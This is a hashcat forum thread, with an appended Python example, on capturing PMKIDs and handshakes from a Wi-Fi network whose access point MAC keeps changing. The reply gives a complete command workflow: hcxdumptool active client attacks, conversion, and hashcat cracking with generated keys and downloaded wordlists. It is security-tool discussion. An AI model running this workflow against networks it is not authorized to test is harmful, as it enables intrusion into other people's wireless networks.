Q related to hcxtools
hashcat Forum, Misc, User Contributions (https://hashcat.net/forum/thread-10342.html)
Q related to hcxtools - damien - 09-20-2021

Hi all,

I am testing hcxdumptool in an environment where there are no autonomous wireless access points, but instead a lightweight access point which gets its config via a wireless controller. It does not seem to work, because the MAC address of the wireless access point changes anytime. As a result I cannot use a filter to attack a specific wireless access point.

Any advice on how to try to get the PMKID in this situation?

regards
Damien

RE: Q related to hcxtools - ZerBea - 09-20-2021

I don't think that this kind of AP is using PMKID caching, because that doesn't make sense if the MAC changes often. Please notice that the PMKID depends on the MAC:

Code:
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Maybe one of the CLIENTs of this NETWORK is weak (M1M2ROGUE). Try to attack them instead of the hardened AP:

Code:
$ hcxdumptool -i INTERFACE -o dumpfile.pcapng --enable_status=23 --active_beacon --stop_client_m2_attacks=100

If there are other APs or CLIENTs in range that you are not targeting, I recommend protecting them by BPFC. From --help:

create BPF to protect a MAC
Code:
$ tcpdump -i <interface> not wlan addr1 11:22:33:44:55:66 and not wlan addr2 11:22:33:44:55:66 -ddd > protect.bpf

and run hcxdumptool with activated BPF:

Code:
$ hcxdumptool -i INTERFACE -o dumpfile.pcapng --enable_status=23 --active_beacon --stop_client_m2_attacks=100 --bpfc=protect.bpf

Then convert to hc22000:

Code:
$ hcxpcapngtool -E wl -I wl -U wl --all -o test.hc22000 dumpfile.pcapng

We have to use --all, because NC is currently broken on hashcat.
https://hashcat.net/forum/thread-10253-post-53602.html#pid53602l

Now use hashcat on the recorded traffic as a first attempt:

Code:
$ hashcat -m 22000 test.hc22000 wl

Proceed with hcxpsktool:

Code:
$ hcxpsktool -c test.hc22000 --weakpass --eudate --usdate --wpskeys | hashcat -m 22000 test.hc22000

Proceed with wpa-sec confirmed lists:

Code:
$ wget https://wpa-sec.stanev.org/dict/rkg.txt.gz

If that doesn't work, do some open source intelligence (OSINT) by DuckDuckGo picture search and try some masks and rules.

These wordlists may be useful, too:
https://3wifi.stascorp.com/3wifi-dic-2021-09-03.7z
https://hashmob.net/downloads
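The PMKID formula quoted in ZerBea's reply, worked through as an added Python example (not code from the thread, nor from hcxtools or hashcat): it computes the PMKID, shows that a change of the AP's MAC changes the PMKID, which is why a PMKID cached under a lightweight AP's old BSSID is useless after the BSSID changes, and renders the value as a hashcat mode 22000 PMKID line. The PMK, the MAC addresses and the ESSID are constructed sample values.

```python
import hashlib
import hmac

# Constructed sample values (not from the thread): a 32-byte PMK, a client MAC,
# and two BSSIDs standing in for one lightweight AP before/after its MAC changed.
PMK = bytes.fromhex("00112233445566778899aabbccddeeff"
                    "ffeeddccbbaa99887766554433221100")
MAC_STA = "f4:74:7f:87:f9:f4"
MAC_AP_BEFORE = "fc:69:0c:15:82:64"
MAC_AP_AFTER = "fc:69:0c:15:82:65"


def mac_bytes(mac: str) -> bytes:
    """Turn 'aa:bb:cc:dd:ee:ff' (or 'aabbccddeeff') into its six raw bytes."""
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def pmkid(pmk: bytes, mac_ap: str, mac_sta: str) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA).

    HMAC-SHA1 yields 20 bytes; the -128 suffix means only the first 16 are kept.
    """
    data = b"PMK Name" + mac_bytes(mac_ap) + mac_bytes(mac_sta)
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16]


def hc22000_pmkid_line(pmk: bytes, mac_ap: str, mac_sta: str, essid: str) -> str:
    """Render a PMKID as a hashcat mode 22000 line of type 01 (PMKID).

    Layout: WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_hex***  (the three trailing
    fields, ANONCE/EAPOL/MESSAGEPAIR, are only filled for type 02, EAPOL).
    """
    return "WPA*01*%s*%s*%s*%s***" % (
        pmkid(pmk, mac_ap, mac_sta).hex(),
        mac_bytes(mac_ap).hex(),
        mac_bytes(mac_sta).hex(),
        essid.encode().hex(),
    )


def cached_pmkid_survives_mac_change() -> bool:
    """ZerBea's point: MAC_AP is an HMAC input, so a PMKID cached under the old
    BSSID no longer matches once the BSSID changes. Returns False here."""
    return pmkid(PMK, MAC_AP_BEFORE, MAC_STA) == pmkid(PMK, MAC_AP_AFTER, MAC_STA)


if __name__ == "__main__":
    print(hc22000_pmkid_line(PMK, MAC_AP_BEFORE, MAC_STA, "hashcat"))
    print("PMKID unchanged after BSSID change:", cached_pmkid_survives_mac_change())
```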